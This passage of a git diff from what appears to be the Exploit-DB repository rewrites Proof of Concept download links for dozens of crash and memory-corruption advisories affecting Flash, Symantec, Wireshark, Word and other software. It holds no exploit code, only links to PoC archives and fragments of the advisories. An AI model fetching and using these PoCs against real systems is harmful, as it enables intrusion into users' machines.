-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39824.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39824.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39825.txt b/exploits/multiple/dos/39825.txt index 265805110..d55b56cdc 100644 --- a/exploits/multiple/dos/39825.txt +++ b/exploits/multiple/dos/39825.txt @@ -8,4 +8,4 @@ http://127.0.0.1/LoadImage.swf?img=70 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39825.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39825.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39826.txt b/exploits/multiple/dos/39826.txt index 50f63901d..2edc7ab14 100644 --- a/exploits/multiple/dos/39826.txt +++ b/exploits/multiple/dos/39826.txt @@ -8,4 +8,4 @@ LoadImage.swf?img=70 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39826.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39826.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39827.txt b/exploits/multiple/dos/39827.txt index 56cc9d578..9129553bb 100644 --- a/exploits/multiple/dos/39827.txt +++ b/exploits/multiple/dos/39827.txt @@ -6,4 +6,4 @@ LoadImage.swf?img=4 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39827.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39827.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39828.txt b/exploits/multiple/dos/39828.txt index ac2b3b2ff..d4e3e4463 100644 --- a/exploits/multiple/dos/39828.txt +++ b/exploits/multiple/dos/39828.txt @@ -4,4 +4,4 @@ The attached mp4 file causes stack corruption in flash. To load, put LoadMP42.sw Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39828.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39828.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39829.txt b/exploits/multiple/dos/39829.txt index a0cc37c69..708d56dc0 100644 --- a/exploits/multiple/dos/39829.txt +++ b/exploits/multiple/dos/39829.txt @@ -30,4 +30,4 @@ function myfunc(){ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39829.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39829.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39830.txt b/exploits/multiple/dos/39830.txt index 66cedf85d..c91e23317 100644 --- a/exploits/multiple/dos/39830.txt +++ b/exploits/multiple/dos/39830.txt @@ -18,4 +18,4 @@ A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39830.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39830.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39831.txt b/exploits/multiple/dos/39831.txt index 83eeb8993..4cbe6ea1c 100644 --- a/exploits/multiple/dos/39831.txt +++ b/exploits/multiple/dos/39831.txt @@ -17,4 +17,4 @@ A swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39831.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39831.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39834.txt b/exploits/multiple/dos/39834.txt index 246fe8017..6f74de430 100644 --- a/exploits/multiple/dos/39834.txt +++ b/exploits/multiple/dos/39834.txt @@ -84,4 +84,4 @@ The bug has been reproduced on a fully patched Windows 7 64-bit with a 32-bit PO Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39834.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39834.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39835.txt b/exploits/multiple/dos/39835.txt index 96782b431..da8193126 100644 --- a/exploits/multiple/dos/39835.txt +++ b/exploits/multiple/dos/39835.txt @@ -115,4 +115,4 @@ Source code is included. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39835.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39835.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39859.txt b/exploits/multiple/dos/39859.txt index 162d3e70d..9c38bf71b 100644 --- a/exploits/multiple/dos/39859.txt +++ b/exploits/multiple/dos/39859.txt @@ -128,4 +128,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1251869. At Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39859.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39859.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39860.txt b/exploits/multiple/dos/39860.txt index 7d932ef7b..297a9dbc2 100644 --- a/exploits/multiple/dos/39860.txt +++ b/exploits/multiple/dos/39860.txt @@ -145,4 +145,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252406. At Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39860.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39860.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39861.txt b/exploits/multiple/dos/39861.txt index a375dbf74..db02fe3a6 100644 --- a/exploits/multiple/dos/39861.txt +++ b/exploits/multiple/dos/39861.txt @@ -72,4 +72,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252411. At Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39861.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39861.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39862.txt b/exploits/multiple/dos/39862.txt index c570b61ba..3a6116ec3 100644 --- a/exploits/multiple/dos/39862.txt +++ b/exploits/multiple/dos/39862.txt @@ -74,4 +74,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254487. At Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39862.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39862.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39863.txt b/exploits/multiple/dos/39863.txt index 461005a6f..4de8d1b47 100644 --- a/exploits/multiple/dos/39863.txt +++ b/exploits/multiple/dos/39863.txt @@ -134,4 +134,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254497. At Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39863.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39863.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39877.txt b/exploits/multiple/dos/39877.txt index e31cc6623..ab34c3f7b 100644 --- a/exploits/multiple/dos/39877.txt +++ b/exploits/multiple/dos/39877.txt @@ -20,4 +20,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39877.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39877.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39906.txt b/exploits/multiple/dos/39906.txt index bc78ffd9a..0419495f3 100644 --- a/exploits/multiple/dos/39906.txt +++ b/exploits/multiple/dos/39906.txt @@ -6,4 +6,4 @@ Let Word recover it, its essential, and then you can trigger the bug afterwards Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39906.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39906.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40031.txt b/exploits/multiple/dos/40031.txt index 21445fe3b..3f21e0471 100644 --- a/exploits/multiple/dos/40031.txt +++ b/exploits/multiple/dos/40031.txt @@ -56,4 +56,4 @@ These bugs are obviously exploitable for remote code execution on all Symantec c Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40031.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40031.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40032.txt b/exploits/multiple/dos/40032.txt index b144eb80b..1aaa80d45 100644 --- a/exploits/multiple/dos/40032.txt +++ b/exploits/multiple/dos/40032.txt @@ -37,4 +37,4 @@ This issue is remotely exploitable just by receiving an email, visiting a websit Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40032.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40032.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40034.txt b/exploits/multiple/dos/40034.txt index 7236f50ba..b238cb803 100644 --- a/exploits/multiple/dos/40034.txt +++ b/exploits/multiple/dos/40034.txt @@ -24,4 +24,4 @@ This obviously won't work, because it doesn't verify that the old name will fit. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40034.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40034.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40035.txt b/exploits/multiple/dos/40035.txt index 12f699f34..43a945793 100644 --- a/exploits/multiple/dos/40035.txt +++ b/exploits/multiple/dos/40035.txt @@ -27,4 +27,4 @@ That's (count + 1) * 4, without any checking that will succeed. The attached tes Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40035.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40035.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40036.txt b/exploits/multiple/dos/40036.txt index b2e21c214..be4ae77f5 100644 --- a/exploits/multiple/dos/40036.txt +++ b/exploits/multiple/dos/40036.txt @@ -52,4 +52,4 @@ start end module name Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40036.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40036.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40037.txt b/exploits/multiple/dos/40037.txt index 8e43dcc79..7cb2558fa 100644 --- a/exploits/multiple/dos/40037.txt +++ b/exploits/multiple/dos/40037.txt @@ -81,4 +81,4 @@ int PPFindRecSet(tagSS_STREAM *stream, Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40037.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40037.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40087.txt b/exploits/multiple/dos/40087.txt index 1f02fc0b0..ff7223fd0 100644 --- a/exploits/multiple/dos/40087.txt +++ b/exploits/multiple/dos/40087.txt @@ -6,4 +6,4 @@ To differentiate this from other ATF issues, this is an overflow in decompressin Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40087.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40087.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40088.txt b/exploits/multiple/dos/40088.txt index 20987f9da..e6c7f0db6 100644 --- a/exploits/multiple/dos/40088.txt +++ b/exploits/multiple/dos/40088.txt @@ -8,4 +8,4 @@ Took a closer look at this, it is a UaF of plane->model_hp_buffer in the open-so Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40088.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40088.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40089.txt b/exploits/multiple/dos/40089.txt index abffffba2..cad5746a8 100644 --- a/exploits/multiple/dos/40089.txt +++ b/exploits/multiple/dos/40089.txt @@ -8,4 +8,4 @@ The issue sometimes takes multiple refreshes to crash Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40089.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40089.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40090.txt b/exploits/multiple/dos/40090.txt index e3c10b2ca..e7efcb010 100644 --- a/exploits/multiple/dos/40090.txt +++ b/exploits/multiple/dos/40090.txt @@ -6,4 +6,4 @@ LoadImage.swf?img=129 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40090.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40090.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40095.txt b/exploits/multiple/dos/40095.txt index f07b76e72..6899f8c8a 100644 --- a/exploits/multiple/dos/40095.txt +++ b/exploits/multiple/dos/40095.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-30.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40095.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40095.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40096.txt b/exploits/multiple/dos/40096.txt index ce4e7e591..729ff23e2 100644 --- a/exploits/multiple/dos/40096.txt +++ b/exploits/multiple/dos/40096.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-29.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40096.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40096.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40097.txt b/exploits/multiple/dos/40097.txt index f2080eef7..84d5efa99 100644 --- a/exploits/multiple/dos/40097.txt +++ b/exploits/multiple/dos/40097.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-28.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40097.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40097.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40098.txt b/exploits/multiple/dos/40098.txt index 4d8502ec8..eca9b4297 100644 --- a/exploits/multiple/dos/40098.txt +++ b/exploits/multiple/dos/40098.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-27.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40098.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40098.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40099.txt b/exploits/multiple/dos/40099.txt index f49d83101..bd7cfb944 100644 --- a/exploits/multiple/dos/40099.txt +++ b/exploits/multiple/dos/40099.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-26.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40099.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40099.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40100.txt b/exploits/multiple/dos/40100.txt index a36abaf11..7d7a23ca6 100644 --- a/exploits/multiple/dos/40100.txt +++ b/exploits/multiple/dos/40100.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-25.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40100.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40100.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40101.txt b/exploits/multiple/dos/40101.txt index dc196722e..af626c15b 100644 --- a/exploits/multiple/dos/40101.txt +++ b/exploits/multiple/dos/40101.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-24.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40101.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40101.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40102.txt b/exploits/multiple/dos/40102.txt index bc29035ed..559b1e36a 100644 --- a/exploits/multiple/dos/40102.txt +++ b/exploits/multiple/dos/40102.txt @@ -54,6 +54,6 @@ visiting a Web page or open a specially crafted SWF file, which contains “Defi =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-23.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40102.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40102.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40103.txt b/exploits/multiple/dos/40103.txt index bb63b46ea..66f3c1ac3 100644 --- a/exploits/multiple/dos/40103.txt +++ b/exploits/multiple/dos/40103.txt @@ -54,6 +54,6 @@ visiting a Web page or open a specially crafted SWF file, which contains ‘Defi =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-22-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40103.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40103.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40104.txt b/exploits/multiple/dos/40104.txt index 87122464b..26bf215cc 100644 --- a/exploits/multiple/dos/40104.txt +++ b/exploits/multiple/dos/40104.txt @@ -52,6 +52,6 @@ visiting a Web page or open a specially crafted SWF file, which contains ‘Scen =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-21.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40104.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40104.zip ############################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40105.txt b/exploits/multiple/dos/40105.txt index 0dacba3cc..dc4eb3677 100644 --- a/exploits/multiple/dos/40105.txt +++ b/exploits/multiple/dos/40105.txt @@ -52,6 +52,6 @@ visiting a Web page or open a specially crafted SWF file, which contains ‘TAG =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-20.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40105.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40105.zip ############################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40194.txt b/exploits/multiple/dos/40194.txt index 88a95611b..ae0129931 100644 --- a/exploits/multiple/dos/40194.txt +++ b/exploits/multiple/dos/40194.txt @@ -28,4 +28,4 @@ Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://s Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40194.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40194.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40195.txt b/exploits/multiple/dos/40195.txt index 2ab27ccab..7f424798f 100644 --- a/exploits/multiple/dos/40195.txt +++ b/exploits/multiple/dos/40195.txt @@ -21,4 +21,4 @@ Fuzzed PCAP eats large amounts of memory ( >4GB ) with a single UDP packet on ts Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40195.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40195.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40197.txt b/exploits/multiple/dos/40197.txt index e8a86b058..b1dfe184c 100644 --- a/exploits/multiple/dos/40197.txt +++ b/exploits/multiple/dos/40197.txt @@ -28,4 +28,4 @@ Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://s Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40197.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40197.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40198.txt b/exploits/multiple/dos/40198.txt index 2af085080..da4573607 100644 --- a/exploits/multiple/dos/40198.txt +++ b/exploits/multiple/dos/40198.txt @@ -28,4 +28,4 @@ Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://s Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40198.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40198.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40199.txt b/exploits/multiple/dos/40199.txt index 64536c233..ad5b840ba 100644 --- a/exploits/multiple/dos/40199.txt +++ b/exploits/multiple/dos/40199.txt @@ -84,4 +84,4 @@ Thread 1 (Thread 0x7ffff7fb9740 (LWP 1578)): Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40199.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40199.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40238.txt b/exploits/multiple/dos/40238.txt index 2adafdc21..0ad720f58 100644 --- a/exploits/multiple/dos/40238.txt +++ b/exploits/multiple/dos/40238.txt @@ -58,6 +58,6 @@ An attacker can use this flaw to read outside the allocated buffer, which could ========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/08/COSIG-2016-32.doc -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40238.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40238.zip ####################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40307.txt b/exploits/multiple/dos/40307.txt index 82618c848..6a6025b37 100644 --- a/exploits/multiple/dos/40307.txt +++ b/exploits/multiple/dos/40307.txt @@ -21,4 +21,4 @@ A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40307.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40307.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40308.txt b/exploits/multiple/dos/40308.txt index 324e24ad1..8709ece1d 100644 --- a/exploits/multiple/dos/40308.txt +++ b/exploits/multiple/dos/40308.txt @@ -23,4 +23,4 @@ A fla and swf are attached. The swf crashes in Chrome for Windows. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40308.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40308.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40309.txt b/exploits/multiple/dos/40309.txt index e1f32c37f..7c43f51c4 100644 --- a/exploits/multiple/dos/40309.txt +++ b/exploits/multiple/dos/40309.txt @@ -26,4 +26,4 @@ A PoC and swf are attached. The PoC crashes in Chrome on 64-bit Windows. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40309.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40309.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40310.txt b/exploits/multiple/dos/40310.txt index 7b8aff86a..493f9dd36 100644 --- a/exploits/multiple/dos/40310.txt +++ b/exploits/multiple/dos/40310.txt @@ -19,4 +19,4 @@ function func(){ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40310.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40310.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40311.txt b/exploits/multiple/dos/40311.txt index 787dfda1a..917cfe9ac 100644 --- a/exploits/multiple/dos/40311.txt +++ b/exploits/multiple/dos/40311.txt @@ -18,4 +18,4 @@ function func(){ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40311.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40311.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40355.txt b/exploits/multiple/dos/40355.txt index 752bfc293..6e11c6110 100644 --- a/exploits/multiple/dos/40355.txt +++ b/exploits/multiple/dos/40355.txt @@ -28,4 +28,4 @@ A sample swf and fla are attached. The PoC prints the value of unallocated memor Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40355.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40355.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40356.txt b/exploits/multiple/dos/40356.txt index 21343543d..20775f1fd 100644 --- a/exploits/multiple/dos/40356.txt +++ b/exploits/multiple/dos/40356.txt @@ -17,4 +17,4 @@ function func(){ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40356.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40356.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40405.txt b/exploits/multiple/dos/40405.txt index 9b368b3b9..ebd6dc22e 100644 --- a/exploits/multiple/dos/40405.txt +++ b/exploits/multiple/dos/40405.txt @@ -10,4 +10,4 @@ As in issue 810, these are remote code execution vulnerabilities at the highest Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40405.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40405.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40420.txt b/exploits/multiple/dos/40420.txt index cc9e7d635..ace2dabee 100644 --- a/exploits/multiple/dos/40420.txt +++ b/exploits/multiple/dos/40420.txt @@ -6,4 +6,4 @@ Fixed in the September update Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40420.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40420.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40421.txt b/exploits/multiple/dos/40421.txt index dba26c864..a1801e9c1 100644 --- a/exploits/multiple/dos/40421.txt +++ b/exploits/multiple/dos/40421.txt @@ -6,4 +6,4 @@ Fixed in the September update Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40421.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40421.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40510.txt b/exploits/multiple/dos/40510.txt index 3b03dc25e..f06919eae 100644 --- a/exploits/multiple/dos/40510.txt +++ b/exploits/multiple/dos/40510.txt @@ -58,6 +58,6 @@ structure that contain an invalid “ConstantPool” could lead to remote code e =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/10/COSIG-2016-35.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40510.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40510.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40654.txt b/exploits/multiple/dos/40654.txt index 667202c93..ad8eedeb0 100644 --- a/exploits/multiple/dos/40654.txt +++ b/exploits/multiple/dos/40654.txt @@ -91,4 +91,4 @@ tested on OS X 10.11.6 (15G31) on MacBookPro10,1 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40654.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40654.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40955.txt b/exploits/multiple/dos/40955.txt index 2eb7067b4..91e214b1a 100644 --- a/exploits/multiple/dos/40955.txt +++ b/exploits/multiple/dos/40955.txt @@ -151,4 +151,4 @@ I fear there are a great number of similar issues so just fixing this once insta Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40955.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40955.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41008.txt b/exploits/multiple/dos/41008.txt index 7fd0a69c2..65e37bbc2 100644 --- a/exploits/multiple/dos/41008.txt +++ b/exploits/multiple/dos/41008.txt @@ -60,6 +60,6 @@ structure that contain an invalid value in “ActionGetURL2” could lead to rem =========== https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41008.zip 